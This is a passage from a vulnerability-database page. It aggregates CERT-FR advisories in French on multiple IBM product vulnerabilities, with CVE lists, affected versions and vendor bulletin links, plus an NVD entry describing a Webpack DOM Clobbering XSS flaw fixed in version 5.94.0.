"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Injection SQL (SQLi)"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-04-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7230739",
"url": "https://www.ibm.com/support/pages/node/7230739"
},
{
"published_at": "2025-04-17",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231169",
"url": "https://www.ibm.com/support/pages/node/7231169"
},
{
"published_at": "2025-04-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7231051",
"url": "https://www.ibm.com/support/pages/node/7231051"
}
]
}
CERTFR-2024-AVI-1030
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans IBM QRadar. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
References
| Title | Publication Time | Tags | |||
|---|---|---|---|---|---|
|
|||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "QRadar User Behavior Analytics versions 1.x \u00e0 4.1.x ant\u00e9rieures \u00e0 4.1.17",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-47831",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47831"
},
{
"name": "CVE-2018-14040",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14040"
},
{
"name": "CVE-2024-34069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34069"
},
{
"name": "CVE-2018-20676",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20676"
},
{
"name": "CVE-2024-1135",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1135"
},
{
"name": "CVE-2018-20677",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20677"
},
{
"name": "CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-47875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47875"
},
{
"name": "CVE-2018-14041",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14041"
},
{
"name": "CVE-2016-10735",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-10735"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2024-34064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34064"
},
{
"name": "CVE-2024-39689",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39689"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-8331",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8331"
}
],
"links": [],
"reference": "CERTFR-2024-AVI-1030",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-11-29T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans IBM QRadar. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans IBM QRadar",
"vendor_advisories": [
{
"published_at": "2024-11-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7176642",
"url": "https://www.ibm.com/support/pages/node/7176642"
}
]
}
CERTFR-2025-AVI-0106
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Cognos Analytics | Cognos Analytics versions 12.x antérieures à 12.0.4 IF2 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 FP5 | ||
| IBM | Security QRadar EDR | Security QRadar EDR versions 3.12.x antérieures à 3.12.15 | ||
| IBM | Db2 | IBM Db2 on Cloud Pak for Data et Db2 Warehouse on Cloud Pak for Data versions 3.5 à 4.8 antérieures à v4.8.8 | ||
| IBM | Security QRadar SIEM | QRadar SIEM versions 7.5.0 antérieures à 7.5.0 UP11 |
References
| Title | Publication Time | Tags | |||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Cognos Analytics versions 12.x ant\u00e9rieures \u00e0 12.0.4 IF2",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 FP5",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Security QRadar EDR versions 3.12.x ant\u00e9rieures \u00e0 3.12.15",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "IBM Db2 on Cloud Pak for Data et Db2 Warehouse on Cloud Pak for Data versions 3.5 \u00e0 4.8 ant\u00e9rieures \u00e0 v4.8.8",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.0 ant\u00e9rieures \u00e0 7.5.0 UP11",
"product": {
"name": "Security QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2023-7104",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7104"
},
{
"name": "CVE-2020-21469",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-21469"
},
{
"name": "CVE-2024-45020",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45020"
},
{
"name": "CVE-2024-46826",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46826"
},
{
"name": "CVE-2024-42070",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42070"
},
{
"name": "CVE-2023-51714",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51714"
},
{
"name": "CVE-2021-47366",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47366"
},
{
"name": "CVE-2024-41093",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41093"
},
{
"name": "CVE-2021-21409",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21409"
},
{
"name": "CVE-2024-36361",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36361"
},
{
"name": "CVE-2024-35939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35939"
},
{
"name": "CVE-2024-41009",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41009"
},
{
"name": "CVE-2024-29041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29041"
},
{
"name": "CVE-2019-9641",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9641"
},
{
"name": "CVE-2022-21426",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21426"
},
{
"name": "CVE-2024-39503",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39503"
},
{
"name": "CVE-2024-50268",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50268"
},
{
"name": "CVE-2024-42292",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42292"
},
{
"name": "CVE-2024-28849",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28849"
},
{
"name": "CVE-2016-2193",
"url": "https://www.cve.org/CVERecord?id=CVE-2016-2193"
},
{
"name": "CVE-2024-42284",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42284"
},
{
"name": "CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"name": "CVE-2024-4068",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4068"
},
{
"name": "CVE-2024-26961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26961"
},
{
"name": "CVE-2024-38608",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38608"
},
{
"name": "CVE-2024-50275",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50275"
},
{
"name": "CVE-2024-49352",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49352"
},
{
"name": "CVE-2023-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
},
{
"name": "CVE-2024-40924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40924"
},
{
"name": "CVE-2024-22353",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22353"
},
{
"name": "CVE-2020-20703",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-20703"
},
{
"name": "CVE-2024-50125",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50125"
},
{
"name": "CVE-2022-48968",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48968"
},
{
"name": "CVE-2024-47715",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47715"
},
{
"name": "CVE-2024-26976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26976"
},
{
"name": "CVE-2024-56326",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56326"
},
{
"name": "CVE-2024-50267",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50267"
},
{
"name": "CVE-2019-9638",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9638"
},
{
"name": "CVE-2022-49016",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49016"
},
{
"name": "CVE-2023-52492",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52492"
},
{
"name": "CVE-2023-5868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5868"
},
{
"name": "CVE-2019-9639",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9639"
},
{
"name": "CVE-2023-28154",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28154"
},
{
"name": "CVE-2024-27062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27062"
},
{
"name": "CVE-2024-35839",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35839"
},
{
"name": "CVE-2024-49977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49977"
},
{
"name": "CVE-2024-43889",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43889"
},
{
"name": "CVE-2019-20444",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20444"
},
{
"name": "CVE-2024-29415",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29415"
},
{
"name": "CVE-2024-46820",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46820"
},
{
"name": "CVE-2024-45018",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45018"
},
{
"name": "CVE-2024-33883",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-33883"
},
{
"name": "CVE-2024-43880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43880"
},
{
"name": "CVE-2024-26615",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26615"
},
{
"name": "CVE-2024-50130",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50130"
},
{
"name": "CVE-2024-4317",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4317"
},
{
"name": "CVE-2024-25026",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25026"
},
{
"name": "CVE-2024-38586",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38586"
},
{
"name": "CVE-2024-53047",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53047"
},
{
"name": "CVE-2024-31141",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31141"
},
{
"name": "CVE-2023-5870",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5870"
},
{
"name": "CVE-2024-4067",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4067"
},
{
"name": "CVE-2024-45769",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45769"
},
{
"name": "CVE-2024-10977",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10977"
},
{
"name": "CVE-2024-27017",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27017"
},
{
"name": "CVE-2018-20506",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20506"
},
{
"name": "CVE-2018-20346",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20346"
},
{
"name": "CVE-2024-46845",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46845"
},
{
"name": "CVE-2024-40983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40983"
},
{
"name": "CVE-2021-37137",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37137"
},
{
"name": "CVE-2023-5869",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5869"
},
{
"name": "CVE-2022-49003",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49003"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2024-35898",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35898"
},
{
"name": "CVE-2024-43854",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43854"
},
{
"name": "CVE-2024-44935",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44935"
},
{
"name": "CVE-2024-50124",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50124"
},
{
"name": "CVE-2022-24823",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-24823"
},
{
"name": "CVE-2024-49875",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49875"
},
{
"name": "CVE-2019-9020",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9020"
},
{
"name": "CVE-2024-41066",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41066"
},
{
"name": "CVE-2021-37136",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37136"
},
{
"name": "CVE-2019-9023",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9023"
},
{
"name": "CVE-2024-7348",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7348"
},
{
"name": "CVE-2024-42244",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42244"
},
{
"name": "CVE-2024-10976",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10976"
},
{
"name": "CVE-2024-41942",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41942"
},
{
"name": "CVE-2021-21295",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21295"
},
{
"name": "CVE-2024-45770",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45770"
},
{
"name": "CVE-2024-26851",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26851"
},
{
"name": "CVE-2022-48773",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48773"
},
{
"name": "CVE-2019-12900",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-12900"
},
{
"name": "CVE-2024-50282",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50282"
},
{
"name": "CVE-2024-24857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24857"
},
{
"name": "CVE-2024-49866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49866"
},
{
"name": "CVE-2024-49949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49949"
},
{
"name": "CVE-2021-43797",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43797"
},
{
"name": "CVE-2024-56201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56201"
},
{
"name": "CVE-2024-41092",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41092"
},
{
"name": "CVE-2024-5569",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-5569"
},
{
"name": "CVE-2024-29736",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29736"
},
{
"name": "CVE-2019-9021",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9021"
},
{
"name": "CVE-2024-27268",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27268"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2022-21434",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21434"
},
{
"name": "CVE-2024-41042",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41042"
},
{
"name": "CVE-2023-2454",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2454"
},
{
"name": "CVE-2022-42004",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42004"
},
{
"name": "CVE-2024-10041",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10041"
},
{
"name": "CVE-2022-34169",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-34169"
},
{
"name": "CVE-2024-43892",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43892"
},
{
"name": "CVE-2024-50252",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50252"
},
{
"name": "CVE-2024-37890",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37890"
},
{
"name": "CVE-2024-47668",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47668"
},
{
"name": "CVE-2017-15010",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-15010"
},
{
"name": "CVE-2023-52921",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52921"
},
{
"name": "CVE-2024-53677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53677"
},
{
"name": "CVE-2024-10978",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10978"
},
{
"name": "CVE-2024-53140",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53140"
},
{
"name": "CVE-2024-50602",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50602"
},
{
"name": "CVE-2023-2455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2455"
},
{
"name": "CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"name": "CVE-2019-20478",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20478"
},
{
"name": "CVE-2024-0985",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0985"
},
{
"name": "CVE-2024-38541",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38541"
},
{
"name": "CVE-2024-40984",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40984"
},
{
"name": "CVE-2023-52922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52922"
},
{
"name": "CVE-2024-50274",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50274"
},
{
"name": "CVE-2024-38540",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38540"
},
{
"name": "CVE-2021-21290",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21290"
},
{
"name": "CVE-2024-29180",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29180"
},
{
"name": "CVE-2022-42003",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42003"
},
{
"name": "CVE-2024-53064",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53064"
},
{
"name": "CVE-2023-50314",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50314"
},
{
"name": "CVE-2023-52917",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52917"
},
{
"name": "CVE-2023-26136",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26136"
},
{
"name": "CVE-2024-44990",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44990"
},
{
"name": "CVE-2023-42282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42282"
},
{
"name": "CVE-2024-42301",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42301"
},
{
"name": "CVE-2024-24786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24786"
},
{
"name": "CVE-2024-22354",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22354"
},
{
"name": "CVE-2024-50279",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50279"
},
{
"name": "CVE-2022-21476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21476"
},
{
"name": "CVE-2019-16869",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16869"
},
{
"name": "CVE-2022-23491",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23491"
},
{
"name": "CVE-2022-21541",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21541"
},
{
"name": "CVE-2024-26924",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26924"
},
{
"name": "CVE-2022-21540",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-21540"
},
{
"name": "CVE-2024-44989",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44989"
},
{
"name": "CVE-2018-20505",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20505"
},
{
"name": "CVE-2024-32007",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-32007"
},
{
"name": "CVE-2024-10979",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10979"
},
{
"name": "CVE-2019-20445",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20445"
},
{
"name": "CVE-2024-40961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40961"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0106",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-02-07T00:00:00.000000"
}
],
"risks": [
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
},
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0 distance.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-02-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7182424",
"url": "https://www.ibm.com/support/pages/node/7182424"
},
{
"published_at": "2025-02-03",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7182335",
"url": "https://www.ibm.com/support/pages/node/7182335"
},
{
"published_at": "2025-02-02",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7181898",
"url": "https://www.ibm.com/support/pages/node/7181898"
},
{
"published_at": "2025-02-04",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7181480",
"url": "https://www.ibm.com/support/pages/node/7181480"
},
{
"published_at": "2025-02-05",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7182696",
"url": "https://www.ibm.com/support/pages/node/7182696"
}
]
}
FKIE_CVE-2024-43788
Vulnerability from fkie_nvd - Published: 2024-08-27 17:15 - Updated: 2024-09-03 15:15
Severity ?
6.4 (Medium) - CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
6.1 (Medium) - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Summary
Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack’s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61 | Patch | |
| security-advisories@github.com | https://github.com/webpack/webpack/issues/18718#issuecomment-2326296270 | ||
| security-advisories@github.com | https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986 | Exploit, Vendor Advisory | |
| security-advisories@github.com | https://research.securitum.com/xss-in-amp4email-dom-clobbering | Exploit, Third Party Advisory | |
| security-advisories@github.com | https://scnps.co/papers/sp23_domclob.pdf | Exploit, Mitigation, Technical Description, Third Party Advisory |
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| webpack.js | webpack | * |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:webpack.js:webpack:*:*:*:*:*:node.js:*:*",
"matchCriteriaId": "10BD162E-912D-4458-A67B-F7BC3602FDC5",
"versionEndExcluding": "5.94.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Webpack is a module bundler. Its main purpose is to bundle JavaScript files for usage in a browser, yet it is also capable of transforming, bundling, or packaging just about any resource or asset. The webpack developers have discovered a DOM Clobbering vulnerability in Webpack\u2019s `AutoPublicPathRuntimeModule`. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an `img` tag with an unsanitized `name` attribute) are present. Real-world exploitation of this gadget has been observed in the Canvas LMS which allows a XSS attack to happen through a javascript code compiled by Webpack (the vulnerable part is from Webpack). DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or id attributes. This issue has been addressed in release version 5.94.0. All users are advised to upgrade. There are no known workarounds for this issue."
},
{
"lang": "es",
"value": "Webpack es un paquete de m\u00f3dulos. Su objetivo principal es agrupar archivos JavaScript para su uso en un navegador, pero tambi\u00e9n es capaz de transformar, agrupar o empaquetar casi cualquier recurso o activo. Los desarrolladores del paquete web han descubierto una vulnerabilidad de DOM Clobbering en `AutoPublicPathRuntimeModule` de Webpack. El gadget DOM Clobbering en el m\u00f3dulo puede conducir a cross site scripting (XSS) en p\u00e1ginas web donde est\u00e1n presentes elementos HTML controlados por atacantes sin secuencias de comandos (por ejemplo, una etiqueta `img` con un atributo `name` no desinfectado). Se ha observado una explotaci\u00f3n de este dispositivo en el mundo real en Canvas LMS, lo que permite que se produzca un ataque XSS a trav\u00e9s de un c\u00f3digo javascript compilado por Webpack (la parte vulnerable es de Webpack). DOM Clobbering es un tipo de ataque de reutilizaci\u00f3n de c\u00f3digo en el que el atacante primero incrusta un fragmento de marcas HTML 